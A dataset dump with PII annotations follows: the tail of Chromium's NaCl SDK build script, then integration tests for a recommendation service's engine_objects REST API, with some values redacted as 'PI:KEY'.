projects found in src/gonacl_appengine/src"""""" + buildbot_common.BuildStep('Build GoNaCl AppEngine Projects') + cmd = ['make', 'upload', 'REVISION=%s' % chrome_revision] + env = dict(os.environ) + env['NACL_SDK_ROOT'] = pepperdir + env['NACLPORTS_NO_ANNOTATE'] = ""1"" + buildbot_common.Run(cmd, env=env, cwd=GONACL_APPENGINE_SRC_DIR) + + +def main(args): + parser = argparse.ArgumentParser(description=__doc__) + parser.add_argument('--qemu', help='Add qemu for ARM.', + action='store_true') + parser.add_argument('--tar', help='Force the tar step.', + action='store_true') + parser.add_argument('--archive', help='Force the archive step.', + action='store_true') + parser.add_argument('--release', help='PPAPI release version.', + dest='release', default=None) + parser.add_argument('--build-app-engine', + help='Build AppEngine demos.', action='store_true') + parser.add_argument('--experimental', + help='build experimental examples and libraries', action='store_true', + dest='build_experimental') + parser.add_argument('--skip-toolchain', help='Skip toolchain untar', + action='store_true') + parser.add_argument('--no-clean', dest='clean', action='store_false', + help=""Don't clean gypbuild directories"") + parser.add_argument('--mac-sdk', + help='Set the mac-sdk (e.g.
10.6) to use when building with ninja.') + parser.add_argument('--no-arm-trusted', action='store_true', + help='Disable building of ARM trusted components (sel_ldr, etc).') + parser.add_argument('--no-use-sysroot', action='store_true', + help='Disable building against sysroot.') + + # To set up bash completion for this command first install optcomplete + # and then add this line to your .bashrc: + # complete -F _optcomplete build_sdk.py + try: + import optcomplete + optcomplete.autocomplete(parser) + except ImportError: + pass + + global options + options = parser.parse_args(args) + + buildbot_common.BuildStep('build_sdk') + + if buildbot_common.IsSDKBuilder(): + options.archive = True + # TODO(binji): re-enable app_engine build when the linux builder stops + # breaking when trying to git clone from github. + # See http://crbug.com/412969. + options.build_app_engine = False + options.tar = True + + # NOTE: order matters here. This will be the order that is specified in the + # Makefiles; the first toolchain will be the default. + toolchains = ['pnacl', 'x86_glibc', 'arm_glibc', 'clang-newlib', 'host'] + + print 'Building: ' + ' '.join(toolchains) + platform = getos.GetPlatform() + + if options.archive and not options.tar: + parser.error('Incompatible arguments with archive.') + + chrome_version = int(build_version.ChromeMajorVersion()) + chrome_revision = build_version.ChromeRevision() + nacl_revision = build_version.NaClRevision() + pepper_ver = str(chrome_version) + pepper_old = str(chrome_version - 1) + pepperdir = os.path.join(OUT_DIR, 'pepper_' + pepper_ver) + pepperdir_old = os.path.join(OUT_DIR, 'pepper_' + pepper_old) + tarname = 'naclsdk_%s.tar.bz2' % platform + tarfile = os.path.join(OUT_DIR, tarname) + + if options.release: + pepper_ver = options.release + print 'Building PEPPER %s at %s' % (pepper_ver, chrome_revision) + + if 'NACL_SDK_ROOT' in os.environ: + # We don't want the currently configured NACL_SDK_ROOT to have any effect + # on the build. + del os.environ['NACL_SDK_ROOT'] + + if platform == 'linux': + # Linux-only: make sure the debian/stable sysroot image is installed + install_script = os.path.join(SRC_DIR, 'build', 'linux', 'sysroot_scripts', + 'install-sysroot.py') + + buildbot_common.Run([sys.executable, install_script, '--arch=arm']) + buildbot_common.Run([sys.executable, install_script, '--arch=i386']) + buildbot_common.Run([sys.executable, install_script, '--arch=amd64']) + + if not options.skip_toolchain: + BuildStepCleanPepperDirs(pepperdir, pepperdir_old) + BuildStepMakePepperDirs(pepperdir, ['include', 'toolchain', 'tools']) + BuildStepDownloadToolchains(toolchains) + BuildStepUntarToolchains(pepperdir, toolchains) + if platform == 'linux': + buildbot_common.Move(os.path.join(pepperdir, 'toolchain', 'arm_trusted'), + os.path.join(OUT_DIR, 'arm_trusted')) + + + if platform == 'linux': + # Linux-only: Copy arm libraries from the arm_trusted package. These are + # needed to be able to run sel_ldr_arm under qemu.
+ arm_libs = [ + 'lib/arm-linux-gnueabihf/librt.so.1', + 'lib/arm-linux-gnueabihf/libpthread.so.0', + 'lib/arm-linux-gnueabihf/libgcc_s.so.1', + 'lib/arm-linux-gnueabihf/libc.so.6', + 'lib/arm-linux-gnueabihf/ld-linux-armhf.so.3', + 'lib/arm-linux-gnueabihf/libm.so.6', + 'usr/lib/arm-linux-gnueabihf/libstdc++.so.6' + ] + arm_lib_dir = os.path.join(pepperdir, 'tools', 'lib', 'arm_trusted', 'lib') + buildbot_common.MakeDir(arm_lib_dir) + for arm_lib in arm_libs: + arm_lib = os.path.join(OUT_DIR, 'arm_trusted', arm_lib) + buildbot_common.CopyFile(arm_lib, arm_lib_dir) + buildbot_common.CopyFile(os.path.join(OUT_DIR, 'arm_trusted', 'qemu-arm'), + os.path.join(pepperdir, 'tools')) + + + BuildStepBuildToolchains(pepperdir, toolchains, + not options.skip_toolchain, + options.clean) + + BuildStepUpdateHelpers(pepperdir, True) + BuildStepUpdateUserProjects(pepperdir, toolchains, + options.build_experimental, True) + + BuildStepCopyTextFiles(pepperdir, pepper_ver, chrome_revision, nacl_revision) + + # Ship with libraries prebuilt, so run that first. + BuildStepBuildLibraries(pepperdir, 'src') + GenerateNotice(pepperdir) + + # Verify the SDK contains what we expect. + BuildStepVerifyFilelist(pepperdir) + + if options.tar: + BuildStepTarBundle(pepper_ver, tarfile) + + if platform == 'linux': + BuildStepBuildPNaClComponent(pepper_ver, chrome_revision) + + if options.build_app_engine and platform == 'linux': + BuildStepBuildAppEngine(pepperdir, chrome_revision) + + if options.qemu: + qemudir = os.path.join(NACL_DIR, 'toolchain', 'linux_arm-trusted') + oshelpers.Copy(['-r', qemudir, pepperdir]) + + # Archive the results on Google Cloud Storage. + if options.archive: + BuildStepArchiveBundle('build', pepper_ver, chrome_revision, nacl_revision, + tarfile) + # Only archive sdk_tools/naclport/pnacl_component on linux. 
+ if platform == 'linux': + BuildStepArchiveSDKTools() + BuildStepArchivePNaClComponent(chrome_revision) + + return 0 + + +if __name__ == '__main__': + try: + sys.exit(main(sys.argv[1:])) + except KeyboardInterrupt: + buildbot_common.ErrorExit('build_sdk: interrupted') +",36336,"[['URL', ""https://chromium.googlesource.com/external/naclports.git'""], ['DATE_TIME', '2012'], ['NRP', 'NACL_DIR'], ['PERSON', 'sys.path.append(os.path.join(NACL_DIR'], ['PERSON', 'https://chromium.googlesource.com/external/naclports.git'], ['PERSON', 'gypbuild'], ['DATE_TIME', ""'32""], ['DATE_TIME', ""'64'""], ['LOCATION', 'tcname'], ['PERSON', 'arch'], ['LOCATION', 'BuildStepCleanPepperDirs(pepperdir'], ['LOCATION', 'pepperdir'], ['PERSON', 'TEXT_FILES'], ['DATE_TIME', 'Year/Month/Day Hour:Minute:Second'], ['LOCATION', 'tmpdir'], ['PERSON', 'full_src_dir'], ['PERSON', 'ppapi'], ['PERSON', 'ppapi'], ['PERSON', 'NACL_HEADER_MAP[GetToolchainLibc(tcname'], ['PERSON', 'libppapi.a'], ['PERSON', 'libppapi.a'], ['PERSON', 'tools_dir = os.path.join(pepperdir'], ['PERSON', 'nonsfi_loader_arm'], ['PERSON', 'sel_ldr_arm'], ['LOCATION', 'tools_dir'], ['LOCATION', 'tools_dir'], ['LOCATION', 'tools_dir'], ['PERSON', 'elif tc'], ['LOCATION', 'tc'], ['PERSON', 'xarch'], ['PERSON', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'out_dir_arm'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['PERSON', 'out_dir_64'], ['DATE_TIME', 'GypNinjaBuild_PPAPI(arch'], ['PERSON', 'ppapi'], ['PERSON', 'ppapi'], ['PERSON', 'arch'], ['PERSON', 'glob.glob(os.path.join(OUT_DIR'], ['PERSON', ""GypNinjaBuild_PPAPI('arm""], ['PERSON', ""GypNinjaBuild_PPAPI('arm""], ['LOCATION', 'GypNinjaBuild_Pnacl(build_dir'], ['PERSON', 'release_build_dir = os.path.join(OUT_DIR'], ['PERSON', 'pnacl_translator_lib_dir = GetPNaClTranslatorLib(pnacldir'], ['PERSON', 'InstallNaClHeaders(GetToolchainNaClInclude(pepperdir'], ['PERSON', 'InstallNaClHeaders(GetToolchainNaClInclude(pepperdir'], ['LOCATION', 'MakeDirectoryOrClobber(pepperdir'], ['PERSON', 'dirname'], ['PERSON', 'dirname'], ['PERSON', ""filters['EXPERIMENTAL""], ['LOCATION', 'BuildStepMakeAll(pepperdir'], ['LOCATION', 'fileroot'], ['PERSON', 'license_files'], ['LOCATION', 'pepperdir'], ['URL', 'archive.si'], ['PERSON', ""Bundle('pepper""], ['LOCATION', 'int(pepper_ver'], ['PERSON', 'step_link=True'], ['URL', 'common.Is'], ['LOCATION', 'nacl'], ['PERSON', 'step_link'], ['PERSON', 'tarfile_dir'], ['URL', 'os.path.jo'], ['PERSON', ""help='Add qemu""], ['PERSON', 'gypbuild'], ['PERSON', 'optcomplete'], ['PERSON', 'pepperdir = os.path.join(OUT_DIR'], ['PERSON', 'naclsdk_%s.tar.bz2'], ['PERSON', 'BuildStepMakePepperDirs(pepperdir'], ['PERSON', 'sel_ldr_arm'], ['PERSON', 'arm_libs'], ['PERSON', 'qemudir'], ['PERSON', 'qemudir'], ['LOCATION', 'naclport'], ['URL', 'http://crbug.com/245456'], ['URL', 'http://crbug.com/245456'], ['URL', 'https://developer.chrome.com/extensions/manifest/version'], ['URL', 'http://crbug.com/412969.'], ['URL', 'sys.ve'], ['URL', 'sys.st'], ['URL', 'sys.pa'], ['URL', 'os.path.jo'], ['URL', 'sys.pa'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'cygtar.py'], ['URL', 'os.path.jo'], ['URL', 'version.py'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Er'], ['URL', 'getos.Ge'], ['URL', 
'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Er'], ['URL', 'os.path.jo'], ['URL', 'version.py'], ['URL', 'common.Ru'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'common.Re'], ['URL', 'common.Ma'], ['URL', 'common.Ma'], ['URL', 'os.path.jo'], ['URL', 'README.Ma'], ['URL', 'os.path.jo'], ['URL', 'text.re'], ['URL', 'text.re'], ['URL', 'text.re'], ['URL', 'version.Ch'], ['URL', 'text.re'], ['URL', 'text.re'], ['URL', 'datetime.datetime.no'], ['URL', 'os.path.jo'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'common.Re'], ['URL', 'common.Ma'], ['URL', 'MAP.ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Ru'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Mo'], ['URL', 'common.Re'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'common.Er'], ['URL', 'os.path.jo'], ['URL', 'os.path.ba'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'common.Ma'], ['URL', 'os.pa'], ['URL', 'common.Co'], ['URL', 'os.path.jo'], ['URL', 'os.path.re'], ['URL', 'generator.so'], ['URL', 'dyncode.so'], ['URL', 'exception.so'], ['URL', 'mappings.so'], ['URL', 'libppapi.so'], ['URL', 'x32.ne'], ['URL', '32.ne'], ['URL', 'x64.ne'], ['URL', '64.ne'], ['URL', 'arm.ne'], ['URL', 'arm.ne'], ['URL', 'getos.Ge'], ['URL', 'nonsfi.ne'], ['URL', 'os.path.jo'], ['URL', 'common.Ma'], ['URL', 'options.no'], ['URL', 'arm.ne'], ['URL', 'arm.ne'], ['URL', 'nonsfi.ne'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'sdk.gy'], ['URL', 'os.path.jo'], ['URL', 'all.gy'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'breakpad.gy'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'client.gy'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'shim.gy'], ['URL', 'options.no'], ['URL', 'options.ma'], ['URL', 'options.ma'], ['URL', 'options.no'], ['URL', 'getos.Ge'], ['URL', 'dir.re'], ['URL', 'env.it'], ['URL', 'key.st'], ['URL', 'common.Ru'], ['URL', 'os.path.jo'], ['URL', 'common.Ru'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'common.Re'], ['URL', 'common.Er'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'common.Er'], ['URL', 'common.Co'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Re'], ['URL', 'common.Ma'], ['URL', 't.st'], ['URL', 't.st'], ['URL', 'getos.Ge'], ['URL', 'common.Re'], ['URL', 'os.path.jo'], ['URL', 're.com'], ['URL', 're.ma'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'os.path.jo'], ['URL', 'notice.Ge'], ['URL', 'os.path.jo'], ['URL', 'files.li'], ['URL', 'filelist.Ve'], ['URL', 'filelist.Pa'], ['URL', 'common.Er'], ['URL', 'files.li'], ['URL', 'filelist.Ve'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'os.path.re'], ['URL', 'common.Er'], ['URL', 'common.Ma'], ['URL', 'os.pa'], ['URL', 'common.Ru'], ['URL', 'util.Do'], ['URL', 'util.Ar'], ['URL', 'util.Ge'], ['URL', 'archive.ch'], ['URL', 'bundle.re'], ['URL', 'bundle.re'], ['URL', 'bundle.ve'], ['URL', 'bundle.de'], ['URL', 'bundle.st'], ['URL', 'bundle.re'], ['URL', 'bundle.ar'], ['URL', 'version.Ch'], ['URL', 'common.Ar'], ['URL', 'os.path.ba'], ['URL', 'os.pa'], ['URL', 'version.Ch'], ['URL', 'bundle.Ge'], ['URL', 'common.Ru'], ['URL', 'component.sh'], ['URL', 'tools.tg'], ['URL', 'common.Ru'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 
'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'sdk.py'], ['URL', 'optcomplete.au'], ['URL', 'parser.pa'], ['URL', 'common.Is'], ['URL', 'options.ar'], ['URL', 'getos.Ge'], ['URL', 'options.ar'], ['URL', 'parser.er'], ['URL', 'version.Ch'], ['URL', 'version.Ch'], ['URL', 'version.Na'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 's.tar.bz'], ['URL', 'os.path.jo'], ['URL', 'options.re'], ['URL', 'options.re'], ['URL', 'os.path.jo'], ['URL', 'install-sysroot.py'], ['URL', 'common.Ru'], ['URL', 'common.Ru'], ['URL', 'common.Ru'], ['URL', 'options.sk'], ['URL', 'common.Mo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'librt.so'], ['URL', 'libpthread.so'], ['URL', 's.so'], ['URL', 'libc.so'], ['URL', 'ld-linux-armhf.so'], ['URL', 'libm.so'], ['URL', 'os.path.jo'], ['URL', 'common.Ma'], ['URL', 'os.path.jo'], ['URL', 'common.Co'], ['URL', 'common.Co'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'options.sk'], ['URL', 'options.cl'], ['URL', 'os.path.jo'], ['URL', 'oshelpers.Co'], ['URL', 'options.ar'], ['URL', 'sys.ar'], ['URL', 'common.Er']]" +35,"# MIT License + +# Copyright (c) 2016 Diogo Dutra dummy@email.com + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. 
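+#
+# (Added summary) Integration tests for the /engine_objects/ endpoints:
+# request validation and CRUD behaviour, plus the asynchronous import_data
+# and export jobs, including combined import+export runs and error paths.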
+ + +import asyncio +import tempfile +from datetime import datetime +from time import sleep +from unittest import mock + +from swaggerit.models._base import _all_models +from tests.integration.fixtures import TopSellerArrayTest + +import pytest +import ujson + + +@pytest.fixture +def init_db(models, session, api): + user = { + 'name': 'test', + 'email': 'test', + 'password': 'test', + 'admin': True + } + session.loop.run_until_complete(models['users'].insert(session, user)) + + tmp = tempfile.TemporaryDirectory() + store = { + 'name': 'test', + 'country': 'test', + 'configuration': {} + } + session.loop.run_until_complete(models['stores'].insert(session, store)) + + item_type = { + 'name': 'products', + 'schema': { + 'type': 'object', + 'id_names': ['sku'], + 'properties': {'sku': {'type': 'string'}} + }, + 'stores': [{'id': 1}] + } + session.loop.run_until_complete(models['item_types'].insert(session, item_type)) + + strategy = { + 'name': 'test', + 'class_module': 'tests.integration.fixtures', + 'class_name': 'EngineStrategyTest' + } + session.loop.run_until_complete(models['engine_strategies'].insert(session, strategy)) + + engine_object = { + 'name': 'Top Seller Object', + 'type': 'top_seller_array', + 'configuration': {'days_interval': 7}, + 'store_id': 1, + 'item_type_id': 1, + 'strategy_id': 1 + } + session.loop.run_until_complete(models['engine_objects'].insert(session, engine_object)) + + + yield tmp.name + + tmp.cleanup() + _all_models.pop('store_items_products_1', None) + + +class TestEngineObjectsModelPost(object): + + async def test_post_without_body(self, init_db, client, headers, headers_without_content_type): + client = await client + resp = await client.post('/engine_objects/', headers=headers) + assert resp.status == 400 + assert (await resp.json()) == {'message': 'Request body is missing'} + + async def test_post_with_invalid_body(self, init_db, client, headers, headers_without_content_type): + client = await client + resp = await client.post('/engine_objects/', headers=headers, data='[{}]') + assert resp.status == 400 + assert (await resp.json()) == { + 'message': ""'name' is a required property. 
""\ + ""Failed validating instance['0'] for schema['items']['required']"", + 'schema': { + 'type': 'object', + 'additionalProperties': False, + 'required': ['name', 'type', 'configuration', 'strategy_id', 'item_type_id', 'store_id'], + 'properties': { + 'name': {'type': 'string'}, + 'type': {'type': 'string'}, + 'strategy_id': {'type': 'integer'}, + 'item_type_id': {'type': 'integer'}, + 'store_id': {'type': 'integer'}, + 'configuration': {} + } + } + } + + async def test_post(self, init_db, client, headers, headers_without_content_type): + client = await client + body = [{ + 'name': 'Top Seller Object Test', + 'type': 'top_seller_array', + 'configuration': {'days_interval': 7}, + 'store_id': 1, + 'item_type_id': 1, + 'strategy_id': 1 + }] + resp = await client.post('/engine_objects/', headers=headers, data=ujson.dumps(body)) + resp_json = (await resp.json()) + body[0]['id'] = 2 + body[0]['store'] = resp_json[0]['store'] + body[0]['strategy'] = resp_json[0]['strategy'] + body[0]['item_type'] = resp_json[0]['item_type'] + + assert resp.status == 201 + assert resp_json == body + + async def test_post_with_invalid_grant(self, client): + client = await client + body = [{ + 'name': 'Top Seller Object Test', + 'type': 'top_seller_array', + 'configuration': {'days_interval': 7}, + 'store_id': 1, + 'item_type_id': 1, + 'strategy_id': 1 + }] + resp = await client.post('/engine_objects/', headers={'Authorization': 'invalid'}, data=ujson.dumps(body)) + assert resp.status == 401 + assert (await resp.json()) == {'message': 'Invalid authorization'} + + +class TestEngineObjectsModelGet(object): + + async def test_get_not_found(self, init_db, headers_without_content_type, client): + client = await client + resp = await client.get( + '/engine_objects/?store_id=2&item_type_id=1&strategy_id=1', + headers=headers_without_content_type + ) + assert resp.status == 404 + + async def test_get_invalid_with_body(self, init_db, headers, client): + client = await client + resp = await client.get( + '/engine_objects/?store_id=1&item_type_id=1&strategy_id=1', + headers=headers, + data='{}' + ) + assert resp.status == 400 + assert await resp.json() == {'message': 'Request body is not acceptable'} + + async def test_get_valid(self, init_db, headers, headers_without_content_type, client): + body = [{ + 'name': 'Top Seller Object', + 'type': 'top_seller_array', + 'configuration': {""days_interval"": 7}, + 'store_id': 1, + 'item_type_id': 1, + 'strategy_id': 1, + 'id': 1, + 'store': { + 'id': 1, + 'name': 'test', + 'country': 'test', + 'configuration': {} + }, + 'item_type': { + 'id': 1, + 'store_items_class': None, + 'stores': [{ + 'configuration': {}, + 'country': 'test', + 'id': 1, + 'name': 'test' + }], + 'name': 'products', + 'schema': { + 'type': 'object', + 'id_names': ['sku'], + 'properties': {'sku': {'type': 'string'}} + }, + 'available_filters': [{'name': 'sku', 'schema': {'type': 'string'}}] + }, + 'strategy': { + 'id': 1, + 'name': 'test', + 'class_module': 'tests.integration.fixtures', + 'class_name': 'EngineStrategyTest', + 'object_types': ['top_seller_array'] + } + }] + + client = await client + resp = await client.get( + '/engine_objects/?store_id=1&item_type_id=1&strategy_id=1', + headers=headers_without_content_type + ) + assert resp.status == 200 + assert await resp.json() == body + + +class TestEngineObjectsModelUriTemplatePatch(object): + + async def test_patch_without_body(self, init_db, client, headers, headers_without_content_type): + client = await client + resp = await 
client.patch('/engine_objects/1/', headers=headers, data='') + assert resp.status == 400 + assert (await resp.json()) == {'message': 'Request body is missing'} + + async def test_patch_with_invalid_body(self, init_db, client, headers, headers_without_content_type): + client = await client + resp = await client.patch('/engine_objects/1/', headers=headers, data='{}') + assert resp.status == 400 + assert (await resp.json()) == { + 'message': '{} does not have enough properties. '\ + ""Failed validating instance for schema['minProperties']"", + 'schema': { + 'type': 'object', + 'additionalProperties': False, + 'minProperties': 1, + 'properties': { + 'name': {'type': 'string'}, + 'configuration': {} + } + } + } + + async def test_patch_with_invalid_config(self, init_db, client, headers, headers_without_content_type): + client = await client + body = { + 'configuration': {} + } + resp = await client.patch('/engine_objects/1/', headers=headers, data=ujson.dumps(body)) + assert resp.status == 400 + print(ujson.dumps(await resp.json(), indent=4)) + assert (await resp.json()) == { + 'message': ""'days_interval' is a required property. ""\ + ""Failed validating instance for schema['required']"", + 'schema': { + 'type': 'object', + 'required': ['days_interval'], + 'additionalProperties': False, + 'properties': { + 'days_interval': {'type': 'integer'} + } + } + } + + async def test_patch_not_found(self, init_db, client, headers, headers_without_content_type): + client = await client + body = { + 'name': 'Top Seller Object Test' + } + resp = await client.patch('/engine_objects/2/', headers=headers, data=ujson.dumps(body)) + assert resp.status == 404 + + async def test_patch(self, init_db, client, headers, headers_without_content_type): + client = await client + body = [{ + 'name': 'Top Seller Object Test', + 'type': 'top_seller_array', + 'configuration': {'days_interval': 7}, + 'store_id': 1, + 'item_type_id': 1, + 'strategy_id': 1 + }] + resp = await client.post('/engine_objects/', headers=headers, data=ujson.dumps(body)) + obj = (await resp.json())[0] + + body = { + 'name': 'test2' + } + resp = await client.patch('/engine_objects/2/', headers=headers, data=ujson.dumps(body)) + obj['name'] = 'test2' + + assert resp.status == 200 + assert (await resp.json()) == obj + + +class TestEngineObjectsModelUriTemplateGet(object): + + async def test_get_with_body(self, init_db, headers, client): + client = await client + resp = await client.get('/engine_objects/1/', headers=headers, data='{}') + assert resp.status == 400 + assert await resp.json() == {'message': 'Request body is not acceptable'} + + async def test_get_not_found(self, init_db, headers_without_content_type, client): + client = await client + resp = await client.get('/engine_objects/2/', headers=headers_without_content_type) + assert resp.status == 404 + + async def test_get(self, init_db, headers, headers_without_content_type, client): + client = await client + resp = await client.get('/engine_objects/1/', headers=headers_without_content_type) + body = { + 'name': 'Top Seller Object', + 'type': 'top_seller_array', + 'configuration': {""days_interval"": 7}, + 'store_id': 1, + 'item_type_id': 1, + 'strategy_id': 1, + 'id': 1, + 'store': { + 'id': 1, + 'name': 'test', + 'country': 'test', + 'configuration': {} + }, + 'item_type': { + 'id': 1, + 'store_items_class': None, + 'stores': [{ + 'configuration': {}, + 'country': 'test', + 'id': 1, + 'name': 'test' + }], + 'name': 'products', + 'schema': { + 'type': 'object', + 'id_names': ['sku'], + 
'properties': {'sku': {'type': 'string'}} + }, + 'available_filters': [{'name': 'sku', 'schema': {'type': 'string'}}] + }, + 'strategy': { + 'id': 1, + 'name': 'test', + 'class_module': 'tests.integration.fixtures', + 'class_name': 'EngineStrategyTest', + 'object_types': ['top_seller_array'] + } + } + + assert resp.status == 200 + assert await resp.json() == body + + +class TestEngineObjectsModelUriTemplateDelete(object): + + async def test_delete_with_body(self, init_db, client, headers): + client = await client + + resp = await client.delete('/engine_objects/1/', headers=headers, data='{}') + assert resp.status == 400 + assert (await resp.json()) == {'message': 'Request body is not acceptable'} + + async def test_delete_valid(self, init_db, client, headers, headers_without_content_type): + client = await client + + resp = await client.get('/engine_objects/1/', headers=headers_without_content_type) + assert resp.status == 200 + + resp = await client.delete('/engine_objects/1/', headers=headers_without_content_type) + assert resp.status == 204 + + resp = await client.get('/engine_objects/1/', headers=headers_without_content_type) + assert resp.status == 404 + + +def datetime_mock(): + mock_ = mock.MagicMock() + mock_.now.return_value = datetime(1900, 1, 1) + return mock_ + + +async def _wait_job_finish(client, headers_without_content_type, job_name='export'): + sleep(0.05) + while True: + resp = await client.get( + '/engine_objects/1/{}?PI:KEY'.format(job_name), + headers=headers_without_content_type) + if (await resp.json())['status'] != 'running': + break + + return resp + + +def set_patches(monkeypatch): + monkeypatch.setattr('swaggerit.models.orm._jobs_meta.random.getrandbits', + mock.MagicMock(return_value=131940827655846590526331314439483569710)) + monkeypatch.setattr('swaggerit.models.orm._jobs_meta.datetime', datetime_mock()) + + +class TestEngineObjectsModelsDataImporter(object): + + async def test_importer_post(self, init_db, headers, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + resp = await client.post('/engine_objects/1/import_data', headers=headers_without_content_type) + + assert resp.status == 201 + assert await resp.json() == {'job_hash': '6342e10bd7dca3240c698aa79c98362e'} + await _wait_job_finish(client, headers_without_content_type, 'import_data') + + async def test_importer_get_running(self, init_db, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await client.post('/engine_objects/1/import_data', headers=headers_without_content_type) + resp = await client.get('/engine_objects/1/import_data?PI:KEY', + headers=headers_without_content_type) + + assert await resp.json() == {'status': 'running'} + await _wait_job_finish(client, headers_without_content_type, 'import_data') + + + async def test_importer_get_done(self, init_db, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await client.post('/engine_objects/1/import_data', headers=headers_without_content_type) + + resp = await _wait_job_finish(client, headers_without_content_type, 'import_data') + + assert await resp.json() == { + 'status': 'done', + 'result': {'lines_count': 3}, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } + + async def test_importer_get_with_error(self, init_db, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + 
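+        # (Added note) side_effect=Exception('testing') below makes every
+        # call to get_data raise, driving the import job into its error path.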
monkeypatch.setattr('tests.integration.fixtures.TopSellerArrayTest.get_data', + mock.MagicMock(side_effect=Exception('testing'))) + client = await client + await client.post('/engine_objects/1/import_data', headers=headers_without_content_type) + + resp = await _wait_job_finish(client, headers_without_content_type, 'import_data') + + assert await resp.json() == { + 'status': 'error', + 'result': {'message': 'testing', 'name': 'Exception'}, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } + + +async def _post_products(client, headers, headers_without_content_type, products=[{'sku': 'test'}]): + resp = await client.post('/item_types/1/items?store_id=1', + data=ujson.dumps(products), headers=headers) + resp = await client.post('/item_types/1/update_filters?store_id=1', + headers=headers_without_content_type) + + sleep(0.05) + while True: + resp = await client.get( + '/item_types/1/update_filters?store_id=1&PI:KEY', + headers=headers_without_content_type) + if (await resp.json())['status'] != 'running': + break + + return resp + + +def set_readers_builders_patch(monkeypatch, values=None): + if values is None: + values = [[ujson.dumps({'value': 1, 'item_key': 'test'}).encode()]] + + readers_builder = values + mock_ = mock.MagicMock() + mock_.return_value = readers_builder + + monkeypatch.setattr( + 'myreco.engine_objects.object_base.EngineObjectBase._build_csv_readers', + mock_ + ) + + +class TestEngineObjectsModelsObjectsExporter(object): + + async def test_exporter_post(self, init_db, headers_without_content_type, headers, client, monkeypatch): + set_patches(monkeypatch) + set_readers_builders_patch(monkeypatch) + + client = await client + await _post_products(client, headers, headers_without_content_type) + resp = await client.post('/engine_objects/1/export', headers=headers_without_content_type) + + assert await resp.json() == {'job_hash': '6342e10bd7dca3240c698aa79c98362e'} + await _wait_job_finish(client, headers_without_content_type) + + async def test_exporter_get_running(self, init_db, headers_without_content_type, headers, client, monkeypatch, loop): + set_patches(monkeypatch) + + prods = [ujson.dumps({'value': i, 'item_key': 'test{}'.format(i)}).encode() for i in range(100)] + set_readers_builders_patch(monkeypatch, [[b'\n'.join(prods)]]) + + client = await client + products = [{'sku': 'test{}'.format(i)} for i in range(10)] + + await _post_products(client, headers, headers_without_content_type, products) + await client.post('/engine_objects/1/export', headers=headers_without_content_type) + + resp = await client.get( + '/engine_objects/1/export?PI:KEY', 